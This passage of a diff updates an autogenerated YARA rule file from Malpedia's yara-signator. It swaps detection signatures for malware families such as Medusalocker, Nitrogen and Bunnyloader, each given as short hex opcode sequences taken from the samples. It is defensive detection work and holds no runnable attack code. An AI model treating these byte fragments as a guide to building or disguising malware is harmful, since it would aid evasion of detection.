-		logic_hash = "21ef3d5712d10364f2b0ca6cdaf9dc2adad20cae2472f23d5b6b628fa15a50bd"
+		logic_hash = "51b27f3518a9a59f8c494e0c229ea4ed8eee50ea1c264f413a97b5fd3e98710d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116237,34 +116558,34 @@ rule MALPEDIA_Win_Fusiondrive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498bca e8???????? 90 4983fd08 7231 4a8d146d02000000 }
-		$sequence_1 = { 4883c420 5b c3 4883611000 488d05e8b50000 48894108 }
-		$sequence_2 = { 488d150b760100 488d4c2420 e8???????? cc 48895c2420 55 }
-		$sequence_3 = { 4c8d34c0 4a8b84e120e00100 4a8b44f028 488945b7 ff15???????? 33d2 }
-		$sequence_4 = { 4488742470 eb22 488d3da7290100 eb19 }
-		$sequence_5 = { 488b05???????? 483b4208 7520 488bc1 4883c110 33d2 4885c0 }
-		$sequence_6 = { 33d2 33c9 ff15???????? 488d0da0620100 eb0c 83f901 750d }
-		$sequence_7 = { 400fb6c7 488b8da0010000 4833cc e8???????? }
-		$sequence_8 = { 488d442470 4889442428 897c2420 4533c9 }
-		$sequence_9 = { 498784f7e8d90100 4883c504 493bec e9???????? 488bc3 4c8d3d2792ffff 498784f7e8d90100 }
+		$sequence_0 = { 8bf8 33db eb44 ff75f8 }
+		$sequence_1 = { 7419 ff33 ff15???????? 8b4d0c 8b45f0 8901 }
+		$sequence_2 = { 8b4508 50 8945f0 8d4508 50 57 }
+		$sequence_3 = { 7405 83fe04 7563 6808020000 8d442424 }
+		$sequence_4 = { 56 ff15???????? 6a00 8d85e8fbffff 50 6a01 }
+		$sequence_5 = { 740e 0fb74802 83c002 6685c9 75ef eb12 66833800 }
+		$sequence_6 = { 8bfa 744d 8d4900 0fb732 }
+		$sequence_7 = { ff15???????? 8bf0 83fe03 7413 83fe02 }
+		$sequence_8 = { 6685c0 743b 8bf0 8d642400 }
+		$sequence_9 = { ff33 ffd6 ff75fc ff15???????? ff75f8 }
 
 	condition:
-		7 of them and filesize < 290816
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Elf_Gobrat_Auto : FILE
+rule MALPEDIA_Win_Alma_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9cb05d8e-88df-5069-9152-096fc77aac24"
+		id = "aee3e7b2-c800-5626-b16d-a97379fcdea3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.gobrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alma_locker_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "29d6047280b8adce38a5f6a7e3d8112ab4747228198bdfc531ab746feecbff32"
-		score = 60
-		quality = 35
+		logic_hash = "d029bcdb50f2458857c09101718554ffd09ec8e36a279b20a435629ea205a537"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116276,32 +116597,32 @@ rule MALPEDIA_Elf_Gobrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4889fa e9???????? 488d842400010000 488d1d22cf1700 b90b000000 488bbc2420020000 }
-		$sequence_1 = { e8???????? 488b842408010000 488b9c2400010000 488b4c2468 e8???????? e9???????? 4883f917 }
-		$sequence_2 = { 8d3431 8d76c6 0f1f440000 4883fa06 0f83bf000000 440fb644145c 4131f0 }
-		$sequence_3 = { e8???????? 488b5c2460 e8???????? 488b6c2448 4883c450 c3 4889442408 }
-		$sequence_4 = { e8???????? 488d3d2cd23b00 e8???????? 488b6c2478 4883ec80 c3 4889ca }
-		$sequence_5 = { ebd5 31f6 90 e8???????? ebcb 498b5010 4839d1 }
-		$sequence_6 = { e8???????? 488b442430 48ffc0 488b5c2420 4883c3fe 488b9424a8010000 488bb42458010000 }
-		$sequence_7 = { f20f10442428 f20f5e05???????? f20f114040 488b542450 6690 4883fa08 7e3f }
-		$sequence_8 = { e8???????? 6690 4885c9 0f8578010000 488d0d90371500 4839c8 7505 }
-		$sequence_9 = { e8???????? 488b6d00 488d05225c0500 488d4c2470 e8???????? 31c0 eb28 }
+		$sequence_0 = { 83c404 83bdc8feffff08 720e ffb5b4feffff e8???????? }
+		$sequence_1 = { e8???????? 83c404 83bdc8feffff08 720e ffb5b4feffff e8???????? }
+		$sequence_2 = { 8d8d70fbffff e8???????? 8d85c8faffff c645fc21 50 8bd3 8d8da0fbffff }
+		$sequence_3 = { 8b4da0 e9???????? c3 8b542408 8d420c 8b4aa0 33c8 }
+		$sequence_4 = { 8b8528e5ffff 8b0485e86a0210 ff3401 ff15???????? 85c0 741e 8b8d40e5ffff }
+		$sequence_5 = { c78510ffffff07000000 837dd010 668985fcfeffff 89850cffffff 720b ff75bc e8???????? }
+		$sequence_6 = { 0f8455fdffff 837dd010 8d8d68feffff 6a00 51 ff75cc }
+		$sequence_7 = { 68???????? b9???????? e8???????? 33c0 c645fc1f }
+		$sequence_8 = { 8d8dd0fbffff e8???????? 8d8de8fbffff e8???????? 8d4d08 e8???????? }
+		$sequence_9 = { 8d4d08 e9???????? 8d8de8fbffff e9???????? 8d8dd0fbffff e9???????? }
 
 	condition:
-		7 of them and filesize < 12853248
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Mirrorkey_Auto : FILE
+rule MALPEDIA_Win_Atmosphere_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "63ba5dc8-af1b-5114-b682-e36b4410bbde"
+		id = "b490d7b3-3c9f-56a0-8e37-e6b8aeb02255"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirrorkey_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmosphere_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "45136c9373865a91139e9dff7c71e7f62a2de8b30b90c9e3be875470ec9069c0"
+		logic_hash = "09ff5db5949a2315ec4eb307f77f435859e4dd2533efb70945aee06235bab5f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116315,32 +116636,32 @@ rule MALPEDIA_Win_Mirrorkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 32c2 8b5508 32c1 8802 83c204 }
-		$sequence_1 = { 8a1c19 8d4f01 81e103000080 7905 49 83c9fc }
-		$sequence_2 = { 8945d4 85c0 745a ff75d0 8d45d4 50 e8???????? }
-		$sequence_3 = { 8d4de8 57 8b13 0f57c0 }
-		$sequence_4 = { 0f434dd8 8b01 8907 8b4104 8d4dc0 }
-		$sequence_5 = { 8d4f04 894dfc 8b07 03c2 7460 }
-		$sequence_6 = { 03c2 75ab 5e 5b 5f }
-		$sequence_7 = { 53 8b5f38 56 8b7754 4e }
-		$sequence_8 = { 33c0 5e 5d c20800 8b5508 }
-		$sequence_9 = { 03c7 8945ec 8b441724 03c7 8945f8 }
+		$sequence_0 = { 8bf1 57 ff15???????? 8b470c 89460c }
+		$sequence_1 = { 83ec14 56 8b7104 85f6 }
+		$sequence_2 = { 8bf9 8b06 8bce 8b1f ff5004 }
+		$sequence_3 = { 56 57 33db 8bf1 8965f0 }
+		$sequence_4 = { 83ec10 c645fc02 8bcc 8965e8 50 51 e8???????? }
+		$sequence_5 = { 8b7c240c 8bf1 57 ff15???????? 8b470c 89460c }
+		$sequence_6 = { 53 56 57 33db 8bf1 8965f0 }
+		$sequence_7 = { 6a04 50 8b11 ff12 }
+		$sequence_8 = { 88460e 33c0 894612 894616 }
+		$sequence_9 = { 56 57 8bf9 6a2e e8???????? 8bf0 }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Xfscashncr_Auto : FILE
+rule MALPEDIA_Win_Medusalocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aa68c3d3-6057-5726-9c6a-29c3062e0a39"
+		id = "c7b2a72f-78dd-502c-b029-e85b0ed2945e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xfscashncr_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.medusalocker_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "8cc1f9194ac942ef01eaad15d7e35adea44a498eaca746d03287f1cf0f22bf7b"
+		logic_hash = "7df5844b357690737586e0cd4cc89af865edb4da022c679b11e7f73e8fc7409a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116354,32 +116675,32 @@ rule MALPEDIA_Win_Xfscashncr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d10 8379080b 7f25 8b5518 52 8b4514 50 }
-		$sequence_1 = { 81e2ffff0000 0bc2 8b4df8 894114 8b45ec 5f 5e }
-		$sequence_2 = { 52 8bcd 50 8d1538864700 e8???????? 58 5a }
-		$sequence_3 = { e8???????? 898550ffffff 8b8550ffffff 8a08 80c101 8b9550ffffff 880a }
-		$sequence_4 = { c1f905 8b5508 83e21f c1e206 8b048dc0195700 0fbe4c1004 81c980000000 }
-		$sequence_5 = { 66d1e2 b802000000 6bc000 8b4d08 66891401 eb86 }
-		$sequence_6 = { 50 8b4d14 e8???????? 50 6a4c 8d8d70ffffff 51 }
-		$sequence_7 = { 8b45f4 83784000 7512 8b450c 83e801 8b4d10 83d900 }
-		$sequence_8 = { 8b4d08 d9ee d95c81fc 8b55f0 8b4508 d90490 d9ee }
-		$sequence_9 = { 51 e8???????? 83c408 dd5d94 dd4594 d9ee dae9 }
+		$sequence_0 = { 8b5004 52 8b00 50 8d4dd8 e8???????? 68???????? }
+		$sequence_1 = { 8b4d0c e8???????? 0fb6c0 85c0 7549 6aff 68???????? }
+		$sequence_2 = { 8955ac 8955b0 8955b4 8d45a8 50 8d4db8 51 }
+		$sequence_3 = { 8d4dd8 e8???????? 0fb708 83f95c }
+		$sequence_4 = { e8???????? 83c408 8945e0 8b55e0 8955dc }
+		$sequence_5 = { 64a300000000 894df0 8b4df0 e8???????? c6400800 8b4df0 }
+		$sequence_6 = { 8b4de8 83c150 e8???????? 8b4de8 e8???????? 8b4df4 64890d00000000 }
+		$sequence_7 = { e8???????? 8b4d08 83c148 51 }
+		$sequence_8 = { 83ec08 8bcc 8965e0 8d4508 50 e8???????? 8b4de4 }
+		$sequence_9 = { 8945ec eb07 c745ec00000000 8b55ec 8955e8 c745fcffffffff 8b4de8 }
 
 	condition:
-		7 of them and filesize < 3126272
+		7 of them and filesize < 1433600
 }
-rule MALPEDIA_Win_Nimrev_Auto : FILE
+rule MALPEDIA_Win_Nitrogen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "20b95ee4-71e8-5d91-8f08-c93eb8ecb6e9"
+		id = "3b860399-f17f-5be6-a7fa-0d462134408c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimrev_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitrogen_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c34627db4cecbf30356b0f5270911b9f9949d87d96e11dd97e4475658561ec16"
+		logic_hash = "7fc10887629eb8cbe7591a0bc8e19e89881d6b530c9068ab47e88598472a7314"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116393,32 +116714,32 @@ rule MALPEDIA_Win_Nimrev_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e002 01d0 01c0 29c1 89c8 83c030 }
-		$sequence_1 = { ffd0 90 e9???????? 90 }
-		$sequence_2 = { 89c1 e8???????? eb04 90 eb01 }
-		$sequence_3 = { e8???????? e8???????? eb04 90 eb01 }
-		$sequence_4 = { 83f001 84c0 7408 90 e8???????? eb01 }
-		$sequence_5 = { 0f95c0 8845f7 eb01 90 807df700 }
-		$sequence_6 = { 8b45ec ba00000000 89c1 e8???????? }
-		$sequence_7 = { 0f93c0 83f001 84c0 7408 90 e8???????? eb01 }
-		$sequence_8 = { 0f93c0 83f001 84c0 7408 90 e8???????? }
-		$sequence_9 = { 83f001 84c0 7408 90 }
+		$sequence_0 = { eb0b c784246805000000000000 8b05???????? 0faf842468050000 8bc0 0fb74c2444 0fbfc9 }
+		$sequence_1 = { 7416 eb25 0fb6442434 0fbec0 c1e007 4898 4889442468 }
+		$sequence_2 = { b8b37e0000 6689442438 0fb605???????? 480fbec0 4889842490000000 488b05???????? 48898424a8010000 }
+		$sequence_3 = { c644245d01 eb05 c644245d00 0fb644245d 8805???????? 0fb7442430 0fb7c0 }
+		$sequence_4 = { eb0b c78424dc02000000000000 8b8424dc020000 398424e0020000 7e02 eb17 0fbf05???????? }
+		$sequence_5 = { b83f670000 668944243c 0fb6442431 0fbec0 05c222fae3 8bc0 4889842498000000 }
+		$sequence_6 = { c744247404000000 488b842440010000 488905???????? 0fb7442428 98 0fbf4c2434 33c1 }
+		$sequence_7 = { e8???????? 4989c3 b9508cf2a7 e8???????? 4883c428 488b4c2408 488b542410 }
+		$sequence_8 = { c644240b35 488b05???????? 4889842498000000 0fb605???????? 0fb6c0 8944246c 0fb6442408 }
+		$sequence_9 = { e8???????? 898424f8020000 0fbe442441 b904000000 4869c98f020000 488d157f9e3b00 89040a }
 
 	condition:
-		7 of them and filesize < 1141760
+		7 of them and filesize < 65433600
 }
-rule MALPEDIA_Win_Gooseegg_Auto : FILE
+rule MALPEDIA_Win_Yahoyah_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b01e34b-c4f4-52eb-8cca-5f132c510659"
+		id = "7d580a73-e71e-51e5-b9b2-111f677f9e42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gooseegg"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gooseegg_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yahoyah_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "40532f14598b07ba3f10571e0b95a9ef51b8ec16ffc21df237328572ddb56a5f"
+		logic_hash = "3c235d0922e2b2ae3e259f93f1da8403405399a9b438615162581b244056f37a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116432,32 +116753,37 @@ rule MALPEDIA_Win_Gooseegg_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 4d8bb4f6b8dd0000 33d2 498bce }
-		$sequence_1 = { 33d2 498bce ff15???????? 488bd8 eb02 33db 4c8d357194ffff }
-		$sequence_2 = { 41b806000000 488d155de50000 483950f0 740c 488b10 4885d2 7404 }
-		$sequence_3 = { 660feb15???????? 660feb0d???????? 4c8d0d848c0000 f20f5cca }
-		$sequence_4 = { c4c173590cc1 4c8d0d75790000 c5f359c1 c5fb101d???????? c5fb102d???????? c4e2f1a91d???????? c4e2f1a92d???????? }
-		$sequence_5 = { e8???????? 837b1000 75dd 488d05fbe20000 483bd8 74d1 488bcb }
-		$sequence_6 = { 488b8b20010000 e8???????? 488db328010000 bd06000000 488d7b38 488d05b2e60000 }
-		$sequence_7 = { ff15???????? 85c0 741f 488b4c2438 488d1536a70000 ff15???????? }
-		$sequence_8 = { 7350 488bca 4c8d0591e10000 83e13f 488bc2 48c1f806 488d0cc9 }
-		$sequence_9 = { 83c8ff f00fc101 83f801 751c 488b4530 488b8888000000 488d05b6000100 }
+		$sequence_0 = { ff15???????? 6a02 53 6af0 }
+		$sequence_1 = { 50 6800080000 ff15???????? ff15???????? }
+		$sequence_2 = { 50 e8???????? 59 53 53 6a03 0fb7c8 }
+		$sequence_3 = { e8???????? 59 56 56 8d45fc 50 }
+		$sequence_4 = { 53 6a03 0fb7c8 b8???????? 50 50 51 }
+		$sequence_5 = { ff15???????? 85c0 7501 c3 56 }
+		$sequence_6 = { 7503 41 eb09 33d2 3bd1 1bc9 83e102 }
+		$sequence_7 = { ff15???????? 6a2e 68???????? e8???????? }
+		$sequence_8 = { 53 53 56 53 ff15???????? 68d0070000 }
+		$sequence_9 = { c1ea18 52 0fb6d0 52 c1e808 }
+		$sequence_10 = { 68???????? 6890ef0000 68???????? 6a60 }
+		$sequence_11 = { ff15???????? 6a3a 56 e8???????? 8bf0 83c410 }
+		$sequence_12 = { 90 33c9 33c0 648b3530000000 8b760c 8b761c }
+		$sequence_13 = { 90 68add13441 ffb53ffbffff 6a00 e8???????? 898521f1ffff }
+		$sequence_14 = { 90 90 90 90 90 68add13441 ffb53ffbffff }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Downeks_Auto : FILE
+rule MALPEDIA_Win_Spyder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30c812bc-f8ec-5caf-b497-f38e34394a41"
+		id = "5e1aebf0-6155-5533-b005-6b02cbbc8082"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.downeks_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyder_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "d7bf58e8bb3246f569b98be2a709ed5695e812ca867b1dab085a6c76aff4235d"
+		logic_hash = "0a4823dcbe7cde22c22d2c4c8ece9fed1a6046b4847d90f2e0d8e717ed405fab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116471,71 +116797,77 @@ rule MALPEDIA_Win_Downeks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bfc4010904 8d44241c e8???????? 50 8d4c2428 6a40 51 }
-		$sequence_1 = { 0f8db6000000 897df8 8bc6 99 f77dfc 8b4cb7fc 85d2 }
-		$sequence_2 = { e8???????? 8b4d08 5f 8b06 8b5004 015804 8d74100c }
-		$sequence_3 = { b9081c0904 e8???????? 83c404 85c0 7e2f 50 68ec210904 }
-		$sequence_4 = { c3 68ec140804 56 e8???????? 83c408 5e 8be5 }
-		$sequence_5 = { eb34 81fefc000000 7507 bf544e0804 eb25 81fefd000000 7507 }
-		$sequence_6 = { c7401002010000 5f 5d c20400 837f1800 7417 6879020000 }
-		$sequence_7 = { 8b8d74ffffff 51 e8???????? 83c404 897588 895d84 889d74ffffff }
-		$sequence_8 = { 8bec 53 8b5d08 8b4330 56 33f6 57 }
-		$sequence_9 = { e9???????? 8d7dc4 e9???????? 8d7dc0 e9???????? 8d7dc4 e9???????? }
+		$sequence_0 = { 488d1587a10000 488d0d68a10000 e8???????? 488d1584a10000 488d0d75a10000 e8???????? }
+		$sequence_1 = { ff5330 ffc6 4883c708 3b7318 7cdf 488b7c2438 488b4b10 }
+		$sequence_2 = { 4c8b4638 498bcc 0fb7d0 4985c6 }
+		$sequence_3 = { 488d0525160000 488d0d6e210000 488905???????? 488d0500160000 48890d???????? 488905???????? 488d05f3150000 }
+		$sequence_4 = { 48ffc0 4883f83c 7647 498bcd e8???????? 4c8d05478a0000 41b903000000 }
+		$sequence_5 = { 488d3d60930000 eb0e 488b03 4885c0 7402 ffd0 }
+		$sequence_6 = { 488bc8 ff15???????? 488d15c05e0000 488bce 488905???????? ff15???????? }
+		$sequence_7 = { 4c8d05ca930000 388c2498000000 0f94c1 4803da }
+		$sequence_8 = { 51 e8???????? 8dbc2494050000 83c9ff 33c0 83c40c }
+		$sequence_9 = { 8dbc24ad050000 889c24ac050000 f3ab 66ab aa }
+		$sequence_10 = { 8ac8 80e920 ebe0 80a00049091000 }
+		$sequence_11 = { 8d8424900d0000 57 50 56 895c2430 }
+		$sequence_12 = { f2ae f7d1 2bf9 682b010000 8bf7 8be9 8bfa }
+		$sequence_13 = { ff15???????? 8d54241c 53 52 8d8424900d0000 57 }
+		$sequence_14 = { 8dbc24a9000000 889c24a8000000 f3ab 66ab 83c424 aa }
+		$sequence_15 = { 8bc3 c1f805 8d3c85204b0910 8bc3 83e01f }
 
 	condition:
-		7 of them and filesize < 1318912
+		7 of them and filesize < 1458176
 }
-rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE
+rule MALPEDIA_Win_Rockloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88136c82-87ab-5f89-8963-9afb9534a540"
-		date = "2021-10-07"
-		modified = "2021-10-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermes_ransom_auto.yar#L1-L125"
+		id = "96a7a61e-00d6-5fd3-8dcd-0a299f4f2b93"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rockloader_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915"
+		logic_hash = "7138f3c287966f118168a5a68bdeb5d70100d456e15e650d1baf5a7a96ef38bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20211007"
-		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
-		malpedia_version = "20211008"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 }
-		$sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? }
-		$sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 }
-		$sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 }
-		$sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff }
-		$sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 }
-		$sequence_6 = { 59 6bc900 668981e8c34000 6a02 }
-		$sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 }
-		$sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 }
-		$sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 }
+		$sequence_0 = { dd5ddc 9b dbe3 dd45dc db5df8 8b55f8 }
+		$sequence_1 = { 40 8a0c30 3acb 75f3 8a0c30 3acb 7413 }
+		$sequence_2 = { 7515 85c0 7505 c60632 }
+		$sequence_3 = { 48 0f84ef000000 48 7407 880e }
+		$sequence_4 = { 8d85a0f7ffff 50 56 c745ece8030000 }
+		$sequence_5 = { 83e915 741f 83e93a 7415 50 68???????? 56 }
+		$sequence_6 = { 7c0e 80f939 7f09 0fbec9 8d44c1d0 eb24 }
+		$sequence_7 = { ff36 53 e8???????? ff36 ff15???????? 8b4608 897e04 }
+		$sequence_8 = { db45f8 8a08 dd45ec d8ca }
+		$sequence_9 = { ff15???????? 8bf3 85db 75b5 5f 5b 5e }
 
 	condition:
-		7 of them and filesize < 7192576
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Finfisher_Auto : FILE
+rule MALPEDIA_Win_Bunnyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b4569af7-ca7f-5273-a891-62c4b9307c04"
+		id = "ece611ac-2894-5ce7-8657-b8f35c78c42b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.finfisher_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunnyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bunnyloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d86e06755c4d193ae8f6772e0ecac909342d4c797dca10b9ca38c301b921ec55"
+		logic_hash = "129a4ff66c7e006295a1adc8f4f2d85689837626bb7a785d4d174a96334a4fa5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116549,36 +116881,32 @@ rule MALPEDIA_Win_Finfisher_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d85ccf9ffff 50 e8???????? }
-		$sequence_1 = { 68???????? 6804010000 8d85ccf9ffff 50 }
-		$sequence_2 = { 8d84860c010000 3938 740a 8b00 51 }
-		$sequence_3 = { 8365fc00 ff36 a1???????? ff5004 }
-		$sequence_4 = { c78584f7ffff40020000 8d8570f7ffff 898580f7ffff 89b588f7ffff 89b58cf7ffff }
-		$sequence_5 = { 8bd8 ffb5acf7ffff 3bde 0f856dffffff ff15???????? }
-		$sequence_6 = { ff4510 394510 72ea eb06 8b4510 }
-		$sequence_7 = { e8???????? 83c424 8b8db0f7ffff 8b4160 8985b4f7ffff 81780c00202200 0f8536050000 }
-		$sequence_8 = { 85c0 0f8538020000 6a04 8bbd48f9ffff 8d4708 }
-		$sequence_9 = { 750a bb9a0000c0 e9???????? 8bd0 8b8dc0f7ffff ff15???????? }
-		$sequence_10 = { ff15???????? 8b8db0f7ffff 895918 8b85a0f7ffff 89411c 32d2 }
-		$sequence_11 = { 8b3f 85ff 75a7 ff45f8 837df825 7293 be010000c0 }
-		$sequence_12 = { ff75fc ff750c ff15???????? 3bc6 }
-		$sequence_13 = { 50 e8???????? 83c41c c745fc04000000 6850020000 }
+		$sequence_0 = { ff33 e8???????? 83c408 85c0 7441 85f6 7535 }
+		$sequence_1 = { ff74242c 8bce 52 ba0e000000 e8???????? 83c40c eb7a }
+		$sequence_2 = { c744881000000000 6af8 ff742428 8bcf e8???????? 8b442410 83c408 }
+		$sequence_3 = { ffb564e6ffff ffd6 6800800000 6a00 57 ff15???????? 6804010000 }
+		$sequence_4 = { ff742418 ba87000000 8bce e8???????? 83c40c 8bd0 e9???????? }
+		$sequence_5 = { 8bcf 0fb68394000000 53 50 6aff e8???????? 8bf0 }
+		$sequence_6 = { ff751c 8b4d08 57 56 ff7510 e8???????? 83c414 }
+		$sequence_7 = { 8bda 8945fc 8bd1 8955f8 3907 7e6d 8b4d08 }
+		$sequence_8 = { ff742410 ba35000000 8bce 6a00 ff74242c e8???????? 83c40c }
+		$sequence_9 = { ff75e8 e8???????? ff75e8 8bf0 e8???????? 33c0 83c40c }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 2998272
 }
-rule MALPEDIA_Win_Divergent_Auto : FILE
+rule MALPEDIA_Win_Fatduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "11ec65d7-b0ac-595b-ba44-5bae97099c0e"
+		id = "62118afa-94f3-55fc-9df2-3b95dac75d0a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
